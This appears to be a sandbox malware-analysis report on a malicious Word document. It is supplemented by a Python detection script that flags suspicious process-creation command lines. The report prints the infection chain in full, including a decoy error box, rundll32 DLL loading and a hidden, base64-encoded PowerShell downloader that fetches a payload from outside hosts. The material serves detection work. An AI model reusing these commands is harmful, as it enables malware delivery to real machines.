Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E..........................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j.....H~.............................}..v....."......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............&..j.....#..............................}..v....($......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j.....H~.............................}..v.....*......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3...............&..j.....+..............................}..v....(,......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j.....H~.............................}..v.....2......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?...............&..j.....3..............................}..v....(4......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j.....H~.............................}..v.....:......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K...............&..j.....;..............................}..v....(<......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j.....H~.............................}..v.....B......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W...............&..j.....C..............................}..v....(D......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j.....H~.............................}..v.....J......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c...............&..j.....K..............................}..v....(L......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j.....H~.............................}..v.....R......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o...............&..j.....S..............................}..v....(T......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j.....H~.............................}..v.....Z......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{...............&..j.....[..............................}..v....(\......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v.....b......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j.....c..............................}..v....(d......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v.....j......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j.....k..............................}..v....(l......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v.....r......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j.....s..............................}..v....(t......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v.....z......0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j.....{..............................}..v....(|......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................&..j....................................}..v.... .......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j.....H~.............................}..v............0.r............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............&..j....................................}..v............0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j.....H~.............................}..v....P.......0.r.....................r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../...............&..j....................................}..v............0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;....... ..........j.....H~.............................}..v............0.r.............XE~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;...............&..j....................................}..v....P.......0.r..............E~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E...............................}..v......5.....0.r...............~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E...............................}..v....0.5.....0.r...............~............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: Doc.doc Virustotal: Detection: 69%
Source: Doc.doc ReversingLabs: Detection: 82%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD ...
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD ...
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnA
CkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL
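The process list above is the whole delivery chain: cmd.exe started with a stacked "cmd cmd cmd cmd /c" prefix, msg.exe as a decoy "Word experienced an error" box, a hidden, encoded PowerShell whose binary name is spelled in mixed case, rundll32.exe loading the downloaded Yvtlx6p4.dll by ordinal (#1) from the user profile, and a second rundll32 generation loading files with non-DLL extensions (.twa, .xtt, ...) from random SysWOW64 subdirectories through the RunDLL export (the "PE file moved" entry below shows one of them is a PE). Note the "Source: unknown" on the cmd.exe entry: Word created that process through WMI (the Win32_Process::Create call recorded above), so it is started by the WMI provider host and its parent is not WINWORD.EXE; a rule keyed on Office spawning cmd.exe misses this sample. The Python below is an added example, not part of the Joe Sandbox report: it parses the report's own "Process created" line format and runs four command-line rules over it. EVENTS copies five lines from the list above with the base64 blob replaced by the stand-in token <base64>, plus one constructed, benign rundll32 line as a control.

```python
"""Process-creation detections run over the sandbox's 'Process created' lines.

Added example, not part of the Joe Sandbox report. EVENTS copies five lines
from the process list above (the base64 blob replaced by the stand-in token
<base64>) and adds one constructed, benign rundll32 line as a control.
"""
import re
from pathlib import PureWindowsPath

EVENTS = r"""
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD <base64>
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD <base64>
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL
"""

# One report line: "Source: <parent> Process created: <image> <command line> [Jump to behavior]"
LINE = re.compile(
    r"^Source: (?P<parent>.*?) Process created: (?P<image>\S+) (?P<cmdline>.*?)(?: Jump to behavior)?$")
WINPATH = re.compile(r"[A-Za-z]:\\[^\s',]+")
CANONICAL_POWERSHELL = {"powershell", "PowerShell", "POWERSHELL", "powershell.exe", "PowerShell.exe"}


def parse_events(text):
    return [m.groupdict() for m in (LINE.match(l.strip()) for l in text.splitlines()) if m]


def rundll32_module(cmdline):
    """(module path, export) for a rundll32 command line; (None, None) if no module path."""
    paths = [p for p in WINPATH.findall(cmdline) if not p.lower().endswith("rundll32.exe")]
    if not paths:
        return None, None
    module = paths[0]
    m = re.match(r"'?\s*,?\s*(#?\w+)", cmdline.split(module, 1)[1])
    return module, (m.group(1) if m else None)


def detect(ev):
    """Rule hits for one parsed event (rule name, ':' and the offending value)."""
    hits = []
    image, cmd = ev["image"].lower(), ev["cmdline"]
    tokens = cmd.split()

    # rundll32 given a module that is not a DLL by extension, or a user-profile
    # module called by ordinal ('#1'), as in the Yvtlx6p4.dll -> *.twa chain above.
    if image.endswith("rundll32.exe"):
        module, export = rundll32_module(cmd)
        if module:
            if PureWindowsPath(module).suffix.lower() not in (".dll", ".cpl", ".ocx"):
                hits.append("rundll32_non_dll_extension:" + module)
            if module.lower().startswith("c:\\users\\") and (export or "").startswith("#"):
                hits.append("rundll32_user_module_by_ordinal:" + module)

    # Encoded (-e/-en/.../-EncodedCommand), hidden-window PowerShell whose binary
    # name is spelled in mixed case, as the 'PowerShell case anomaly' and
    # 'Suspicious powershell command line' signatures in this report flag.
    ps = next((t for t in tokens if t.lower() in ("powershell", "powershell.exe")), None)
    if ps is not None:
        encoded = any(len(t) >= 2 and "-encodedcommand".startswith(t.lower()) for t in tokens)
        hidden = re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I) is not None
        if encoded and hidden and ps not in CANONICAL_POWERSHELL:
            hits.append("powershell_encoded_hidden_case_anomaly:" + ps)

    # cmd.exe started with stacked 'cmd cmd cmd cmd /c' tokens, as in the first line.
    if image.endswith("cmd.exe") and len(tokens) > 1 and tokens[0].lower() == tokens[1].lower() == "cmd":
        hits.append("cmd_stacked_prefix")
    return hits


def scan(text):
    """[(image, hit)] over every event in a block of report lines."""
    return [(ev["image"], hit) for ev in parse_events(text) for hit in detect(ev)]


if __name__ == "__main__":
    for image, hit in scan(EVENTS):
        print(image, "->", hit)
```

Running it flags the cmd.exe line twice (stacked prefix, and the encoded PowerShell carried in its command line), the powershell.exe line, the first rundll32 (user-profile module by ordinal) and the .twa rundll32, and nothing on the shell32.dll control. All four rules match on the command line rather than on the parent, which is what survives the WMI launch. The extension allow-list (.dll/.cpl/.ocx) is deliberately narrow and should be tuned against a baseline of legitimate rundll32 usage before it is deployed.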
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2094179270.0000000002AE0000.00000002.00000001.sdmp
Source: Doc.doc Initial sample: OLE summary subject = fuchsia Health & Industrial copying PNG National Handcrafted Plastic Towels utilize Baby & Grocery interface array

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Doc.doc Stream path 'Macros/VBA/Qfepbztq9r8o1l76' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Qfepbztq9r8o1l76 Name: Qfepbztq9r8o1l76
PowerShell case anomaly found
